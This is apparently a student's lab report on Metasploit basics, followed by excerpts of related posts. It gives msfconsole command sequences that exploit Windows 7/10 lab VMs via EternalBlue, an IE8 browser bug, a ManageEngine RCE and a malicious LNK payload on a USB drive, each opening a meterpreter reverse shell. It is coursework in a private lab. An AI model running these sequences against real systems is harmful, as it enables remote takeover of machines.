20164305 徐广皓 Exp5 MSF基础应用

  • 一、知识点总结
  • 二、攻击实例
    • 主动攻击的实践

      • ms08_067(win7)

        • payload/generic/shell_reverse_tcp(失败)
        • payload/windows/meterpreter/reverse_tcp(失败)
      • ms17_010_eternalblue(win7)
        • payload/windows/x64/meterpreter/reverse_tcp(成功)
    • 攻击浏览器的实践
        • ms11_050(win7)(成功)

      ms14_064(win7)  

        • exploit/windows/browser/ms14_064_ole_code_execution (失败)
    • 攻击客户端的实践
      • ManageEngine Applications Manager 13.5远程代码执行漏洞 (CVE-2018-7890)

        • manageengine_appmanager_exec (成功且唯一)
    • 成功应用任何一个辅助模块
      • usb fileforma (成功)
  • 三、实验总结

一、知识点总结

1.MSF攻击方法

  • 主动攻击:扫描主机漏洞,进行攻击
  • 攻击浏览器
  • 攻击其他客户端

2.MSF的六种模块

  • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

    • 主动渗透攻击:攻击某个系统服务
    • 被动渗透攻击:攻击某个客户端应用
  • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

    • 网络服务的扫描与查点
    • 探查敏感信息泄露、Fuzz测试发掘漏洞
    • 收集登录密码
  • 空字段模块Nop Modules

    • 一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)
    • 由于系统无法精确计算shellcode的起始地址,所以加入nops以增加攻击成功的概率
  • 编码模块Encoders后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    • 改变payload形状,使得不出现特定字符
    • 确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”
  • 查看六种模块源码目录/usr/share/metasploit-framework/modules

3.MSF的三种用户操作界面

 

  • msfconsole

    • 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
    • 查看设置信息show [options]
    • 查看攻击目标类型show [target]
    • 查找命令search
      • 查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows
  • armitagewebgui

    • 启动服务器service postgresql start

    • 启动armitagearmitage

二、攻击实例

没实现ms08_067

靶机:Microsoft Windows 7

payload : generic/shell_reverse_tcp

实验步骤

通过菜单栏图标直接打开Armitag

根据已知信息推导出目标主机所在网段的IP,扫描目标网段完整信息,确认目标网络拓扑结构以实施网络侦查。依次选择Hosts->Nmap Scan->Quick Scan(OS detect)

虚拟机所在网段位192.168.80.0/24

Win10虚拟机IP信息

扫描后得到网段中4个虚拟机包括主机

选中靶机192.168.80.137,右键选择Services,查看靶机上开启的服务:

选中靶机192.168.80.137,右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据

可见类似前几次实验在Metasploit中手动配置主机号、端口号等设置现在统统直接自动化了!

利用上一步中漏洞扫描得到的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中靶机192.168.80.137,依次选择菜单栏Attacks->Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块:

在利用Armitage完成对靶机的攻击模块自动化搜索以后,选中192.168.80.137机右键可以发现多了Attack菜单。依次选择Attack->smb->ms08_067_netapi菜单,选择smb漏洞下的ms08_067漏洞对WIN7靶机进行攻击(也可以在Armitage左侧树型目录下依次选择exploit->windows->smb->ms08_067_netapi找到该漏洞):

launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

为啥???然后我去看了一下适用系统,没有win7我哭了,我之前在做啥子?

 实现MS17_010_eternalblue

靶机:Microsoft Windows 7

payload :windows/meterpreter/reverse_tcp

实验步骤

依然铁头娃,这次手动配置(肯定是能成功的)

 1 use auxiliary/scanner/smb/smb_ms17_010
 2 set RHOST 192.168.80.141
 3 Run
 4 Back
 5 search ms17_010
 6 use exploit/windows/smb/ms17_010_eternalblue
 7 set RHOST 192.168.80.141
 8 show options
 9 set payload windows/meterpreter/reverse_tcp
10 set LHOST 192.168.80.130
11 run

实现ms11_050

靶机:Microsoft Windows 7 + IE8

payload : windows/meterpreter/reverse_tcp

实验步骤

1 search ms11_050
2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement
3 set srvhost 192.168.80.130
4 set payload windows/meterpreter/reverse_tcp
5 set LHOST 192.168.80.130
6 show targets
7 set target 4
8 Run
9 http://192.168.80.130:8080/zrCOkaFC

实现CVE-2018-7890

靶机:Windows 10

实现这一攻击需要ManageEngine Applications Manager 13.5,网上有相关警报书

网络上通用版本为13.5(试用版30天),实际上不怎么好用。。。只需要启动验证服务,但也不是每次都能成功地 (我也试了半天才成功,成功之后电脑蓝屏我还没快照 o(╥﹏╥)o)

1 use exploit/windows/http/manageengine_appmanager_exec
2 show options
3 set RHOST 192.168.80.136
4 Set RPORT 6305
5 set LHOST 192.168.80.130
6 set payload windows/meterpreter/reverse_tcp
7 exploit

虽然显示的是13版本,但安装的时候显示的13.5安装.......我也不知道怎么回事可能不显示之后的版本号吧

实现CVE-2017-8464

攻击靶机:Win7

1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce
2 set payload windows/meterpreter/reverse_tcp
3 set LHOST 192.168.80.130
4 exploit
5 cp -r /root/.msf4/local/ /media/root/KINGSTON
6 use multi/handler
7 set paylaod windows/meterpreter/reverse_tcp
8 set LHOST 192.168.80.130
9 Exploit

这里要注意系统要开启U盘自动播放,如果没开启双击第一个文件就行

实验感想

做攻击之前,要看看攻击对当前版本是否可行,避免出现铁头娃现象。对于不同的攻击,可能有一次不行之后就成功的现象,要多次尝试分析其中的原因才能进行判断。由于我的实验中基本使用win7和win10,所以大部分早起漏洞都修补了,找新漏洞就有些困难,尤其是win10找了半天才试出来一个,幸好那个漏洞软件公司没有修补,要不再找一个唯一还会花很长时间。

原文地址:https://www.cnblogs.com/zui-luo/p/10734877.html

时间: 2024-10-12 17:57:28

20164305 徐广皓 Exp5 MSF基础应用的相关文章

20164305 徐广皓 Exp6 信息搜集与漏洞扫描

信息搜集技术与隐私保护 间接收集 无物理连接,不访问目标,使用第三方信息源 使用whois/DNS获取ip 使用msf中的辅助模块进行信息收集,具体指令可以在auxiliary/gather中进行查询 可以利用搜索引擎进行在线查询 直接收集 msf nmap nmap可以实现网络扫描.主机检测.漏洞探测.安全扫描 常用参数集合 -vv 设置对结果详细输出 -p 设置扫描的端口号/端口范围 sP 设置扫描方式为ping扫描 -sU 设置扫描方式为udp扫描 --traceroute 设置路由追踪

20164305 徐广皓 Exp7 网络欺诈防范

实验环境 Windows本机 Windows下虚拟机中(网络源均设置为共享网络模式): Kali Linux - 64bit(攻击机,IP为192.168.80.130) Windows 7 - 64bit(靶机,IP为192.168.80.145) Windows 10- 64bit(靶机,IP为192.168.80.148) 基础问题回答 通常在什么场景下容易受到DNS spoof攻击? 在同一局域网下比较容易受到DNS spoof攻击,攻击者可以冒充域名服务器,来发送伪造的数据包,从而修改

Exp5 MSF基础应用 20154302 薛师凡

Exp5 MSF基础应用 20154302 薛师凡 一.基础问题回答 (1)用自己的话解释什么是 exploit , payload , encode. exploit: 是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机. payload: 就是被运送的间谍,到了房子里头就可以执行各种间谍活动.简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务. encode: 是间谍穿的伪装的衣服,便

20155208徐子涵 Exp5 MSF基础应用

20155208徐子涵 Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. Exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用.有漏洞不一定就有Exploit(利用).有Exploit就肯定有漏洞,所以说exploit和漏洞就是紧密相关的. Payload:payload属于名词意思有:有效载荷,而在网络攻防这一领域,他也可以说成是有效攻击载荷,相当于是将shellcode进行执行. Encode:encode的意

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155209 Exp5 MSF基础应用

Exp5 MSF基础应用 实验准备 在实验之前,上网搜集了很多有关Metasploit渗透测试的资料.对这次实验影响最大的是一篇最受欢迎的10个Metasploit模块和插件.排名第一位的是MSB-MS12-020,比MSB-MS08-067这个经典漏洞的排名还高.我就实验了这个,而且本次实验中很多试了一下这里面的受欢迎漏洞.但是大多数没成功. 实验MSB-MS12-020时,发现他是辅助模块下的漏洞,所以就先写辅助模块的项目. 成功应用任何一个辅助模块 应用MSB-MS12-020辅助模块 漏